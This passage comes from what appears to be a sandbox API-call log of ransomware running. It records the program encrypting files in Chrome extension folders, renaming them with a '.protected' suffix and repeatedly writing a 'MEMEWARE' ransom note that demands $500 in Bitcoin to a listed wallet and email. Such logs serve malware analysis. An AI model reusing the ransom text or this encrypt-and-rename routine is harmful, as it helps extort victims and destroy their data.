hTemplateFile=0x0) returned 0x164 [0079.895] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.895] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.896] lstrlenA (lpString="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") returned 684 [0079.896] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.896] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.896] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.896] CloseHandle (hObject=0x164) returned 1 [0079.896] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.896] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0079.896] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0079.896] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0079.896] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0079.896] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0079.897] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr") returned 143 [0079.897] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0079.897] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0079.897] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\*") returned 145 [0079.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.897] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.897] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.897] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.897] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.897] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.897] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\.") returned 145 [0079.897] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.897] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.897] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.897] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.897] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.897] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.897] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.897] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\..") returned 146 [0079.897] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.897] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.897] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.897] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.897] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.897] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.897] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.898] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.898] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json") returned 157 [0079.898] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.898] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.898] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.898] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json") returned 157 [0079.898] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json") returned 157 [0079.898] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json") returned 157 [0079.898] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.898] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.899] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.899] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.900] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.900] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.900] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.900] CloseHandle (hObject=0x168) returned 1 [0079.900] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.protected") returned 167 [0079.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.protected")) returned 1 [0079.901] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.901] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.901] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\RESTORE_FILES.txt") returned 161 [0079.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.901] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.901] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.902] lstrlenA (lpString="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") returned 684 [0079.902] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.902] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.902] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.902] CloseHandle (hObject=0x164) returned 1 [0079.902] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.902] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0079.902] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0079.902] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0079.903] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0079.903] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0079.903] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk") returned 143 [0079.903] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0079.903] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0079.903] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\*") returned 145 [0079.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.904] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.904] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.904] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.904] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.904] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.904] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\.") returned 145 [0079.904] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.904] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.904] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.904] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.904] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.904] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.904] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.904] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\..") returned 146 [0079.904] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.904] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.904] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.904] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.904] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.904] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.904] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.904] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json") returned 157 [0079.904] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.904] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.904] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.904] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.905] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json") returned 157 [0079.905] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.905] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json") returned 157 [0079.905] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.905] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json") returned 157 [0079.905] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.905] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.906] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.906] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.906] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.906] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.907] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.907] CloseHandle (hObject=0x168) returned 1 [0079.907] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.protected") returned 167 [0079.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.protected")) returned 1 [0079.908] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.908] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.908] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\RESTORE_FILES.txt") returned 161 [0079.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.908] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.908] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.909] lstrlenA (lpString="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") returned 684 [0079.909] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
